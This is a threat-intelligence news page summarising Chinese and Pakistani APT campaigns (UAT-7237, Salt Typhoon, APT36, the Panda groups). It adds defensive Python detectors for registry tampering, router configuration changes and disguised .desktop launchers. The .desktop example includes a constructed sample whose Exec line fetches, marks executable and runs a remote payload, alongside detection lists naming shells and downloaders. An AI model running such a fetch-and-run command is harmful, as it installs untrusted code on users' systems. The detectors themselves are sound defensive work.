CyberHappenings

UAT-7237 APT Group Targets Taiwan Web Servers with Customized Open-Source Tools

1 unique source, 1 article

Summary


A Chinese-speaking APT group tracked as UAT-7237 has been targeting web infrastructure entities in Taiwan since at least 2022. The group relies on customized open-source tools to establish long-term access in high-value environments and is believed to be a sub-group of UAT-5918, which has been active since 2023. Intrusions begin with the exploitation of known security flaws in unpatched servers, followed by reconnaissance and the deployment of custom malware, including a shellcode loader called SoundBill and Cobalt Strike. For persistent access the group installs SoftEther VPN clients and uses RDP; for privilege escalation and credential extraction it uses JuicyPotato and Mimikatz. It has also been observed modifying the Windows Registry to disable User Account Control (UAC) and to make Windows store cleartext passwords, running FScan to identify open ports, and setting Simplified Chinese as the preferred display language in its SoftEther VPN client configuration file.
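The registry changes described above are cheap to detect after the fact if registry telemetry is collected. The following is an added example (not code from the original report or from this site) that runs a simple check over Sysmon Event ID 13 (RegistryEvent: Value Set) records. It assumes the UAC change is EnableLUA=0 and that "store cleartext passwords" means the WDigest UseLogonCredential value being set to 1; the report summary does not name the values, so both are assumptions, and the event records are constructed, not real telemetry.

```python
"""Detect the two Windows Registry changes the summary attributes to UAT-7237
from Sysmon Event ID 13 (RegistryEvent: Value Set) records.

Assumptions (not stated on the page): the UAC change is EnableLUA=0, and the
cleartext-password change is WDigest UseLogonCredential=1, the usual way to
make LSASS keep plaintext credentials."""
import json

# Key: full value path as Sysmon writes TargetObject.
# Value: (data that indicates the weakening change, human-readable reason).
WATCHED_VALUES = {
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA": (
        0, "UAC disabled (EnableLUA=0)"),
    r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential": (
        1, "WDigest cleartext credential caching enabled (UseLogonCredential=1)"),
}


def parse_dword(details):
    """Return the integer from a Sysmon Details string such as
    'DWORD (0x00000000)', or None if the written data is not a DWORD."""
    details = details.strip()
    if not details.upper().startswith("DWORD"):
        return None
    start, end = details.find("("), details.rfind(")")
    if start == -1 or end <= start:
        return None
    try:
        return int(details[start + 1:end], 16)
    except ValueError:
        return None


def normalize_key(path):
    """Fold hive aliases and control-set spellings so lookups match."""
    path = path.replace("HKEY_LOCAL_MACHINE", "HKLM")
    path = path.replace("ControlSet001", "CurrentControlSet")
    return path


def find_uat7237_registry_changes(events):
    """Return one finding per EID 13 event that sets a watched value to its weak data."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        key = normalize_key(ev.get("TargetObject", ""))
        match = next((v for k, v in WATCHED_VALUES.items()
                      if k.lower() == key.lower()), None)
        if match is None:
            continue
        bad_data, why = match
        if parse_dword(ev.get("Details", "")) == bad_data:
            findings.append({"host": ev.get("Computer"), "image": ev.get("Image"),
                             "key": key, "why": why})
    return findings


# Constructed sample records (not real telemetry): a benign Run-key write,
# a UAC disable, a WDigest enable, and a WDigest write that sets the safe value.
SAMPLE_EVENTS = [
    {"EventID": 13, "Computer": "web01", "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\tools\u.exe"},
    {"EventID": 13, "Computer": "web01", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Computer": "web01", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Computer": "web02", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
     "Details": "DWORD (0x00000000)"},
]

if __name__ == "__main__":
    for finding in find_uat7237_registry_changes(SAMPLE_EVENTS):
        print(json.dumps(finding))
```

The image that performed the write is kept in the finding on purpose: reg.exe or PowerShell touching these values from an interactive web-server session is the interesting case, whereas a management agent writing the same values during provisioning is worth an allow-list entry rather than an alert.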

Timeline

  1. 15.08.2025 19:20 · 1 article

    UAT-7237 APT Group Targets Taiwan Web Servers




Similar Happenings

Chinese State-Sponsored Actors Targeting Global Critical Infrastructure

Chinese state-sponsored Advanced Persistent Threat (APT) actors, including the Salt Typhoon group, are conducting a sustained campaign to gain long-term access to critical infrastructure networks worldwide. A joint advisory attributes this cluster of activity to multiple APTs that partially overlap with Salt Typhoon. The actors exploit vulnerabilities in routers and other edge network devices used by telecommunications providers, ISPs, and other infrastructure operators; the campaign targets telecommunications, transportation, lodging, government, and military networks, and has reached at least 600 organizations across 80 countries, including 200 in the U.S. The advisory highlights a shift in Chinese state-sponsored activity from pure espionage toward gaining long-term access for potential disruption, posing a significant threat to national and economic security.

The actors have had considerable success exploiting publicly known vulnerabilities in Ivanti Connect Secure, Ivanti Policy Secure, Palo Alto Networks PAN-OS, and Cisco IOS XE. The advisory suspects they may also target Fortinet firewalls, Juniper firewalls, Microsoft Exchange, Nokia routers and switches, Sierra Wireless devices, and SonicWall firewalls. To maintain persistence and evade detection they modify Access Control Lists (ACLs), open standard and non-standard ports, enable SSH servers, and create tunnels over protocols. They also target authentication protocols and infrastructure, such as Terminal Access Controller Access Control System Plus (TACACS+), to facilitate lateral movement across network devices.

The advisory provides extensive, actionable guidance for defenders, including monitoring network device configuration changes, auditing network services and tunnels, and checking logs for integrity.

Separately, 45 previously unreported domains associated with Salt Typhoon and UNC4841 have been discovered, dating back to May 2020. The oldest, onlineeylity[.]com, was registered on May 19, 2020. The domains were registered using Proton Mail email addresses and fake personas, and they point to both high-density and low-density IP addresses, with the earliest activity traced back to October 2021. The domains are linked to Chinese cyber espionage campaigns and suggest potential overlaps between Salt Typhoon and UNC4841.
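Monitoring configuration changes on network devices, as the advisory recommends, comes down to diffing periodic snapshots of the running configuration and flagging the kinds of additions listed above. The following is an added example (not code from the advisory or from this site) that does exactly that for two constructed Cisco IOS-style snapshots: ACL edits, SSH and management-service changes, non-standard service ports, new tunnel interfaces and AAA/TACACS+ changes are reported with the section they appeared in. The device syntax, the tactic labels and the sample configurations are all assumptions made for the example.

```python
"""Diff two snapshots of a network device's running configuration and flag the
changes the advisory lists as persistence tactics: ACL edits, SSH/management
service changes, non-standard service ports, tunnels and AAA/TACACS+ changes.

Cisco IOS-style syntax is assumed; both snapshots below are constructed."""
import re

# (tactic label, regex tested against each added or removed config line).
# Order matters: the first matching pattern wins.
SUSPECT_PATTERNS = [
    ("nonstandard_port", re.compile(r"^ip (ssh|http) (secure-)?port \d+")),
    ("ssh_service", re.compile(r"^ip ssh\b|^transport input\b.*\bssh\b")),
    ("tunnel", re.compile(r"^interface Tunnel\d+|^tunnel (source|destination|mode)\b")),
    ("acl_change", re.compile(r"^(ip )?access-list\b|^(permit|deny)\b")),
    ("aaa_change", re.compile(r"^aaa\b|^tacacs")),
]


def parse_config(text):
    """Return a set of (section, line) pairs. Indented lines belong to the
    nearest preceding unindented line (e.g. 'interface Tunnel100'); top-level
    lines use section ''. Blank lines and '!' separators are dropped."""
    entries, section = set(), ""
    for raw in text.splitlines():
        stripped = raw.strip()
        if not stripped or stripped.startswith("!"):
            section = ""          # '!' ends the current block in IOS output
            continue
        if raw[0] not in " \t":
            section = stripped
            entries.add(("", stripped))
        else:
            entries.add((section, stripped))
    return entries


def classify(line):
    """Map a config line to a tactic label, or None if it is not of interest."""
    for label, rx in SUSPECT_PATTERNS:
        if rx.search(line):
            return label
    return None


def audit_config_change(before_text, after_text):
    """Return findings for suspicious lines added to or removed from the config."""
    before, after = parse_config(before_text), parse_config(after_text)
    findings = []
    for change, entries in (("added", after - before), ("removed", before - after)):
        for section, line in sorted(entries):
            label = classify(line)
            if label:
                findings.append({"change": change, "section": section,
                                 "line": line, "tactic": label})
    return findings


# Constructed snapshots. The 'after' config adds an ACL permit for an outside
# range, a GRE-style tunnel to an external host, moves SSH to a non-standard
# port, and drops TACACS+ from the login method list.
CONFIG_BEFORE = """!
hostname edge-rtr1
!
aaa new-model
aaa authentication login default group tacacs+ local
!
ip access-list extended MGMT-IN
 permit tcp 10.0.0.0 0.0.0.255 any eq 22
 deny ip any any
!
interface GigabitEthernet0/0
 ip address 192.0.2.1 255.255.255.0
!
line vty 0 4
 transport input ssh
!
"""

CONFIG_AFTER = """!
hostname edge-rtr1
!
aaa new-model
aaa authentication login default local
!
ip access-list extended MGMT-IN
 permit tcp 10.0.0.0 0.0.0.255 any eq 22
 permit tcp 198.51.100.0 0.0.0.255 any
 deny ip any any
!
interface GigabitEthernet0/0
 ip address 192.0.2.1 255.255.255.0
!
interface Tunnel100
 ip address 10.99.0.1 255.255.255.252
 tunnel source GigabitEthernet0/0
 tunnel destination 203.0.113.7
!
ip ssh port 2222 rotary 1
!
line vty 0 4
 transport input ssh
!
"""

if __name__ == "__main__":
    for f in audit_config_change(CONFIG_BEFORE, CONFIG_AFTER):
        print(f"{f['change']:7} [{f['tactic']}] {f['section'] or '<global>'}: {f['line']}")
```

Removed lines are reported as well as added ones because weakening is often a deletion (here the TACACS+ method dropping out of the login list), and a change that only watches additions would miss it. In production the snapshots would come from a configuration-management store or scheduled `show running-config` pulls, and the patterns would be tuned to the platforms in use.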

APT36 leverages Linux .desktop files for malware deployment in ongoing espionage campaign

APT36, a Pakistani threat actor also known as Transparent Tribe, is abusing Linux .desktop launcher files to install malware in attacks targeting government and defense entities in India. The campaign, active since August 1, 2025, aims at data exfiltration and maintaining persistent access. The attacks use phishing emails to deliver ZIP archives containing malicious .desktop files disguised as PDFs. The malware, a Go-based ELF executable, establishes persistence and communicates over a WebSocket channel for command and control. The campaign also targets Windows and BOSS Linux systems, using decoy PDFs and anti-debugging techniques to evade detection.
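A .desktop file is a plain-text launcher: whatever its Name and Icon say, the desktop runs the Exec= line when the user double-clicks it, which is the whole trick behind a "PDF" that is really a launcher. The following is an added example (not code from the report or from this site) that parses the [Desktop Entry] group and flags a file that presents as a PDF while its Exec= line runs a shell or downloader. Both sample launchers are constructed for the example; the malicious Exec= line is an illustrative pattern and is not taken from the reported campaign.

```python
"""Parse a Linux .desktop launcher and flag the mismatch a 'PDF' lure relies on:
the entry presents as a PDF (Name, Icon, MimeType, Comment) but Exec= runs a
shell, interpreter or downloader. Samples are constructed for this example."""
import re
import shlex

SHELLS = {"sh", "bash", "dash", "zsh"}
LAUNCHERS = SHELLS | {"python", "python3", "perl", "curl", "wget", "chmod", "nohup", "xterm"}


def parse_desktop_entry(text):
    """Return the key=value pairs of the [Desktop Entry] group only."""
    entries, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip()] = value.strip()
    return entries


def assess_desktop_file(text):
    """Return a verdict dict: name, exec line, suspicious flag and the reasons."""
    e = parse_desktop_entry(text)
    exec_line = e.get("Exec", "")
    try:
        argv = shlex.split(exec_line)
    except ValueError:            # unbalanced quotes: fall back to a plain split
        argv = exec_line.split()
    prog = argv[0].rsplit("/", 1)[-1] if argv else ""
    claims_pdf = any("pdf" in e.get(k, "").lower()
                     for k in ("Name", "Icon", "MimeType", "Comment"))
    reasons = []
    if claims_pdf and prog in LAUNCHERS:
        reasons.append(f"presents as a PDF but Exec runs {prog}")
    if prog in SHELLS and "-c" in argv:
        reasons.append("Exec wraps an inline shell command (-c)")
    if re.search(r"\b(curl|wget)\b.*\b(chmod|sh|bash)\b", exec_line):
        reasons.append("Exec downloads content and then executes it")
    if reasons and e.get("Terminal", "").lower() == "false":
        reasons.append("Terminal=false keeps the command out of sight")
    return {"name": e.get("Name", ""), "exec": exec_line,
            "suspicious": bool(reasons), "reasons": reasons}


# Constructed samples. The benign one opens a real document with xdg-open; the
# malicious one carries a PDF name and icon but fetches and runs a payload.
# 203.0.113.10 is a documentation-range address, not a real indicator.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Quarterly_Report.pdf
Icon=application-pdf
Exec=xdg-open /home/user/Documents/Quarterly_Report.pdf
Terminal=false
"""

MALICIOUS_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Notes.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s http://203.0.113.10/x -o /tmp/.x; chmod +x /tmp/.x; /tmp/.x"
"""

if __name__ == "__main__":
    for sample in (BENIGN_DESKTOP, MALICIOUS_DESKTOP):
        verdict = assess_desktop_file(sample)
        print(verdict["name"], "suspicious" if verdict["suspicious"] else "ok",
              "; ".join(verdict["reasons"]))
```

The check keys on the program in Exec= rather than on the file name, so a launcher that opens a decoy document with a viewer is left alone while one that hands control to a shell is flagged regardless of how convincing its name and icon are. The same parser can be pointed at files extracted from a mail attachment or at ~/.config/autostart entries when hunting for persistence.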

Chinese APTs Murky Panda, Genesis Panda, and Glacial Panda escalate cloud and telecom espionage

Three China-nexus cyber espionage groups, Murky Panda (also known as Silk Typhoon), Genesis Panda, and Glacial Panda, have escalated their activities against the cloud and telecom sectors. Murky Panda exploits trusted cloud relationships and zero-day vulnerabilities to breach enterprise networks. Genesis Panda targets cloud service providers to expand access and establish persistence. Glacial Panda targets telecommunications organizations to exfiltrate call detail records and related communications telemetry. The groups share TTPs including exploitation of internet-facing appliances and known vulnerabilities, and living-off-the-land techniques; their operations are driven by intelligence gathering and by maintaining stealth and persistence. Murky Panda has been observed exploiting CVE-2025-0282 in Ivanti Pulse Connect VPN, zero-day vulnerabilities in SaaS providers' cloud environments, and delegated administrative privileges (DAP) in Microsoft cloud solution providers to gain Global Administrator rights across all downstream tenants. The group uses compromised SOHO devices as proxy servers to blend malicious traffic with normal traffic and deploys web shells such as Neo-reGeorg and China Chopper to establish persistence.